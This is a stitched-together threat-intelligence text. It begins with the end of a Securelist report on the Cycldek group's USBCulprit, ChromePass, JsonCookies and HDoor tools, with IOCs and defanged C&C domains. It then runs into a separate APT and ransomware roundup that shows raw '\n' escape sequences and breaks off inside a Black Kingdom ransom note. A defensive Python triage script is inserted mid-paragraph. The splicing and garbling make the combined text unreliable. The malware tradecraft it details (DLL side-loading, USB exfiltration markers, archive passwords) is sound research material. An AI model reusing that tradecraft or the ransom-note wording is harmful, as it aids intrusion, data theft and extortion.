Furthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated with a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both clusters. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix.
All in all, this suggests the entities operating behind those clusters are sharing multiple resources – both code and infrastructure – and operating under a single organizational umbrella.

_Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>))_

## Info stealing and lateral movement toolset

During the analysis, we were able to observe a variety of tools downloaded by both BlueCore and RedCore implants and used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools – some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized by the attackers to complete specific tasks.

As in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Update (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.

As already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a NirSoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump process memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

 * **Custom HDoor**: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. The custom version used by Cycldek uses a small subset of the features; the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.

_Figure 7: Command line usage of the custom HDoor tool ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>))_

 * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing the stolen cookie info. Entries in the file resemble this one:

        {
            "domain": ".google.com",
            "id": 1,
            "name": "NID",
            "path": "/",
            "value": "%VALUE%"
        }

 * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as shown below.

_Figure 8: Command line usage of the ChromePass tool ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>))_

## Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB.
This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of TTPs similar to those seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive, named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro), forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

_Figure 9: USBCulprit's loading flow, as observed in samples after 2017 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>))_

Once USBCulprit is loaded into memory and executed, it operates in three phases:

 * **Bootstrap and data collection**: this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide file extensions in Windows and ensure that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect the files it intends to steal, using a function named 'CUSB::USBFindFile'. These are sought by enumerating several predefined directories to locate documents with one of the following extensions: '*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf'. Every document found is logged in a file that lists all paths targeted for theft within a directory, such that every checked directory has a corresponding list file.

The chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.

It is worth noting that the sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to contain a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 01/06/2016 00:00:00.

 * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.

When a USB drive is connected, the malware verifies whether stolen data should be exfiltrated to it or whether it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' is searched for in the drive and, if not found, is created. This directory is used as the target path for copying files to the drive or as the source path for obtaining them from it.

To understand which direction of file copy should take place, a special marker file named '1.txt' is searched for locally. If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempts to copy it to the disk. Otherwise, the local archive files are copied to the same directory, from the disk to the drive.

_Figure 10: USBCulprit's check for the 1.txt marker, indicating whether stolen files should be copied to the removable drive or from it ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>))_

 * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' is checked locally to decide whether lateral movement should be conducted or not. Only if this file exists is the malware's binary copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler. Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess, based on how they are handled, that they are used as extension modules or updated versions of the malware itself. The former is an archive that is extracted to a specific directory, whose files are then enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine on which the malware was executed is indeed part of a segregated network.

_Figure 11: Commands used to profile the network connectivity of the compromised host ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>))_

Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around.
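The marker files, the '$Recyc1e.Bin' staging directory and the 'time' cutoff described above are plain file-system artifacts, so an incident responder can check a suspect removable drive and a suspect working directory for them without executing anything. The Python below is an added example for this page, not code from the report: it builds a constructed fixture laid out the way the analysis describes an infection, then reports what it finds on the 'drive' and in the 'host' directory. The RAR and module file contents in the fixture are placeholders.

```python
"""Triage of a removable drive and a host directory for USBCulprit artifacts.

Added example, not code from the report. It looks for the on-disk traces the
analysis above describes: the '$Recyc1e.Bin' staging directory (digit '1'
impersonating 'l') and the RAR archives inside it, the two GUID-named
extension/update files on the drive, the local '1.txt' / '2.txt' marker files
and the 'time' file holding a 'YYYYMMDDHHMMSS' modification-time cutoff.
build_constructed_fixture() creates constructed test data in a temp directory.
"""
from datetime import datetime
from pathlib import Path
import tempfile

STAGING_DIR = "$Recyc1e.Bin"
EXTENSION_FILES = {
    "{D14030E9-C60C-481E-B7C2-0D76810C6E96}",  # archive of modules, per the report
    "{D14030E9-C60C-481E-B7C2-0D76810C6E95}",  # binary copied to %TEMP% and run
}
COPY_FROM_DRIVE_MARKER = "1.txt"  # present: archives are pulled from the drive
SPREAD_MARKER = "2.txt"           # present: the malware copies itself to the drive
TIME_FILE = "time"
DEFAULT_TIME_MARKER = "20160601000000"


def parse_time_marker(value):
    """Parse the 'time' file content; '20160601000000' is 2016-06-01 00:00:00."""
    return datetime.strptime(value.strip(), "%Y%m%d%H%M%S")


def triage_removable_volume(root):
    """Report USBCulprit traces on a mounted removable volume."""
    root = Path(root)
    staging = root / STAGING_DIR
    archives = sorted(p.name for p in staging.glob("*.rar")) if staging.is_dir() else []
    modules = sorted(p.name for p in root.iterdir() if p.name in EXTENSION_FILES)
    return {
        "staging_dir_present": staging.is_dir(),
        "archives": archives,
        "extension_modules": modules,
    }


def triage_host_directory(workdir):
    """Report marker files next to a suspected USBCulprit executable."""
    workdir = Path(workdir)
    time_file = workdir / TIME_FILE
    cutoff = parse_time_marker(time_file.read_text()) if time_file.is_file() else None
    return {
        "copy_from_drive": (workdir / COPY_FROM_DRIVE_MARKER).is_file(),
        "spread_to_drive": (workdir / SPREAD_MARKER).is_file(),
        "time_cutoff": cutoff,
    }


def build_constructed_fixture():
    """Create a constructed volume and host directory laid out like an infection."""
    base = Path(tempfile.mkdtemp(prefix="usbculprit-triage-"))
    volume, host = base / "volume", base / "host"
    (volume / STAGING_DIR).mkdir(parents=True)
    (volume / STAGING_DIR / "doc1.rar").write_bytes(b"Rar!\x1a\x07\x00constructed")
    (volume / "{D14030E9-C60C-481E-B7C2-0D76810C6E96}").write_bytes(b"constructed")
    (volume / "holiday.jpg").write_bytes(b"unrelated user file")
    host.mkdir()
    (host / SPREAD_MARKER).write_text("")           # '2.txt': spread mode on
    (host / TIME_FILE).write_text(DEFAULT_TIME_MARKER)
    return volume, host


if __name__ == "__main__":
    vol, hst = build_constructed_fixture()
    print(triage_removable_volume(vol))
    print(triage_host_directory(hst))
```

The time parsing mirrors the format the malware expects ('YYYYMMDDHHMMSS'), so the default value '20160601000000' comes back as 1 June 2016. Point triage_removable_volume at a mounted drive and triage_host_directory at the directory an unknown wrapper.exe/TmDbgLog.dll pair was found in; the lookalike directory name uses a digit one, so a search for the legitimate $Recycle.Bin does not find it.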
That observation, together with the very specific files that the malware seeks as executable extensions and that could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.

## Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated with the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple points where these entities did not work in a well-coordinated manner, for example, infecting machines with the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

### Appendix - IOCs

_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.

**RedCore**:

 * A6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL)
 * 4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)

**BlueCore**:

 * 1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL)
 * 6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL)
 * 6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL)
 * 600E14E4B0035C6F0C6A344D87B6C27F - stdole.tlb (encrypted shellcode and implant)

**Lateral Movement and Info-Stealing Toolset**:

 * 1640EE7A414DFF996AF8265E0947DE36 - ChromePass
 * 1EA07468EBDFD3D9EEC59AC57A490701 - ChromePass
 * 07EE1B99660C8CD5207E128F44AA8CBC - JsonCookies
 * 809196A64CA4A32860D28760267A1A8B - Custom HDoor
 * 81660985276CF9B6D979753B6E581D34 - Custom HDoor
 * A44804C2767DCCD4902AAE30C36E62C0 - Custom HDoor

**USBCulprit**:

 * A9BCF983FE868A275F8D9D8F5DEFACF5 - USBCulprit Loader
 * C73B000313DCD2289F51B367F744DCD8 - USBCulprit Loader
 * 2FB731903BD12FF61E6F778FDF9926EE - USBCulprit Loader
 * 4A21F9B508DB19398AEE7FE4AE0AC380 - USBCulprit Loader
 * 6BE1362D722BA4224979DE91A2CD6242 - USBCulprit Loader
 * 7789055B0836A905D9AA68B1D4A50F09 - USBCulprit Loader
 * 782FF651F34C87448E4503B5444B6164 - USBCulprit Loader
 * 88CDD3CE6E5BAA49DC69DA664EDEE5C1 - USBCulprit Loader
 * A4AD564F8FE80E2EE52E643E449C487D - USBCulprit Loader
 * 3CA7BD71B30007FC30717290BB437152 - USBCulprit Payload
 * 58FE8DB0F7AE505346F6E4687D0AE233 - USBCulprit Payload
 * A02E2796E0BE9D84EE0D4B205673EC20 - USBCulprit Payload
 * D8DB9D6585D558BA2D28C33C6FC61874 - USBCulprit Payload
 * 2E522CE8104C0693288C997604AE0096 - USBCulprit Payload

**Toolset overlapping in both clusters:**

| **Common Name** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** |
---|---|---|---|---
chromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar[.]com:8080 | http://news.trungtamwtoa[.]com:88 | ChromePass
goopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn[.]com:8080 | http://mychau.dongnain[.]com:443, http://hcm.vietbaonam[.]com:443 | USBCulprit
 | 2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys[.]com:8080, http://tinmoi.thoitietdulich[.]com:443, http://tinmoi.thoitietdulich[.]com:53 | http://tinmoi.vieclamthemde[.]com:53, http://tinmoi.vieclamthemde[.]com | USBCulprit
qclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh[.]com | http://tinmoi.vieclamthemde[.]com, http://tintuc.daikynguyen21[.]com | BlueCore loading hijacked DLL
silverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew[.]com:443, http://cdn.laokpl[.]com:8080 | http://login.dangquanwatch[.]com:53, http://info.coreders[.]com:8080 | Custom HDoor

**C&Cs and Dropzones**:

 * http://web.laovoanew[.]com - Red Cluster
 * http://tinmoi.vieclamthemde[.]com - Red Cluster
 * http://kinhte.chototem[.]com - Red Cluster
 * http://news.trungtamwtoa[.]com - Red Cluster
 * http://mychau.dongnain[.]com - Red Cluster
 * http://hcm.vietbaonam[.]com - Red Cluster
 * http://login.thanhnienthegioi[.]com - Red Cluster
 * http://103.253.25.73 - Red Cluster
 * http://luan.conglyan[.]com - Red Cluster
 * http://toiyeuvn.dongaruou[.]com - Red Cluster
 * http://tintuc.daikynguyen21[.]com - Red Cluster
 * http://web.laomoodwin[.]com - Red Cluster
 * http://login.giaoxuchuson[.]com - Red Cluster
 * http://lat.conglyan[.]com - Red Cluster
 * http://thegioi.kinhtevanhoa[.]com - Red Cluster
 * http://laovoanew[.]com - Red Cluster
 * http://cdn.laokpl[.]com - Red Cluster
 * http://login.dangquanwatch[.]com - Blue Cluster
 * http://info.coreders[.]com - Blue Cluster
 * http://thanhnien.vietnannnet[.]com - Blue Cluster
 * http://login.diendanlichsu[.]com - Blue Cluster
 * http://login.vietnamfar[.]com - Blue Cluster
 * http://cophieu.dcsvnqvmn[.]com - Blue Cluster
 * http://nghiencuu.onetotechnologys[.]com - Blue Cluster
 * http://tinmoi.thoitietdulich[.]com - Blue Cluster
 * http://khinhte.chinhsech[.]com - Blue Cluster
 * http://images.webprogobest[.]com - Blue Cluster
 * http://web.hcmuafgh[.]com - Blue Cluster
 * http://news.cooodkord[.]com - Blue Cluster
 * http://24h.tinthethaoi[.]com - Blue Cluster
 * http://quocphong.ministop14[.]com - Blue Cluster
 * http://nhantai.xmeyeugh[.]com - Blue Cluster
 * http://thoitiet.yrindovn[.]com - Blue Cluster
 * http://hanghoa.trenduang[.]com - Blue Cluster

_Source: "Cycldek: Bridging the (air) gap", Securelist, published 2020-06-03, <https://securelist.com/cycldek-bridging-the-air-gap/97157/>_

## Targeted attacks

### The leap of a Cycldek-related threat actor

It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte.
While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. 
Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. 
[DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. 
The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.

One such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public-facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which the servers can be silently controlled.

This tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019, and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.

Since neither the rootkit nor the other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools besides Moriya consists of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.

### PuzzleMaker

On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies.
Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.

While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.

On April 20, we reported these vulnerabilities to Microsoft, and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as part of the June Patch Tuesday.

The exploit chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turn connects to the C2 to get commands.

We weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).

### Andariel adds ransomware to its toolset

In April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory.
The threat actor only delivered the final stage payload to selected victims.

During the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed them to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.

Historically, Andariel has mainly targeted organizations in South Korea, and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.

We also found additional connections with the Andariel group. Each threat actor has a characteristic habit when it interactively works with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.

Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlining the financial motivation of this threat actor.

### Ferocious Kitten

[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers.
The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.

We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes and clipboard content, provides file download and upload capabilities, and is able to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method.

Ferocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often, and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.

## Other malware

### Evolution of JSWorm ransomware

While ransomware has been around for a long time, it has evolved as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>).
Many ransomware gangs have switched to the more profitable tactic of "big-game hunting", and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).

As a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.

We recently published an analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.

Each "re-branded" version has included alterations to different aspects of the code – file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.

### Black Kingdom ransomware

[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was deployed by an unknown adversary exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)).
This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.

The malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one with a dynamically generated key and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).

Black Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.

```
***************************
| We Are Back ?
***************************

We hacked your (( Network )), and now all files, documents, images,
databases and other important data are safely encrypted using the strongest algorithms ever.
You cannot access any of your files or services .
But do not worry. You can restore everthing and get back business very soon ( depends on your actions )

before I tell how you can restore your data, you have to know certain things :

